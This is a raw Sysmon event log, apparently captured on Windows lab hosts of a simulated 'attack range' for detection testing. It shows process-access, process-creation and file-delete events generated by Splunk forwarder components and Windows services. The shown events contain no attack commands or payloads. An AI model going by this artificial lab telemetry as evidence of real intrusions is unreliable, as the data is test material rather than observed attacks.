11:24:44.709{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222732Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.709{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222731Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.709{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222730Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.709{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222729Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.709{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222728Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.709{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-197C-6216-4805-000000003902}2356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222727Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.710{4F8D34B0-197C-6216-4805-000000003902}2356C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000222726Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.490{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C59F99B0075AB71A99E12DE4D1459925,SHA256=A513E5A3B95BA39A75DEFD85BEC9025F9FF9530816A24D6B7F6C64A89A9BD693,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222725Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.193{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-197C-6216-4705-000000003902}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222724Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.193{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222723Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.193{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222722Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.193{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222721Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.193{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222720Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.193{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222719Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.193{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222718Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.193{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222717Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.193{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222716Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.193{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222715Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.193{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-197C-6216-4705-000000003902}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000222714Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.193{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-197C-6216-4705-000000003902}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000222713Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:44.194{4F8D34B0-197C-6216-4705-000000003902}1904C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298938Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:24:45.428{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CBA2DD9A0FFDD49B76B6B8902C7BD16,SHA256=27A455D07C324581550E1F9473D9B0DFF7E47DCA4F3A86E0308E05AD28E79ACD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222743Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:45.490{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5428F9E50BD10DA3DF716065A22D2F8F,SHA256=C991EAC0CB3B4A4A2CC00E0F69649FAB935AD9AE03229D7C3164BB3ACDD03196,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222742Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:45.209{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B409EFBD2AC7C3638009F84DA5880A58,SHA256=36E86C94E20212A669774964E0D206914CACC40C2EDD0A0884E6E6F648EC5248,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000222741Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:45.209{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=475A9AFD86577C6310419745552B3759,SHA256=CDF8B33D3AF22625C069A1295B141C7E13572A1F1F971EC78D84A22656F0D099,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222740Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:45.068{4F8D34B0-197C-6216-4805-000000003902}23562336C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000222758Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:46.740{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000222757Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:46.662{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-197E-6216-4905-000000003902}420C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222756Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:24:46.662{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000222755Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 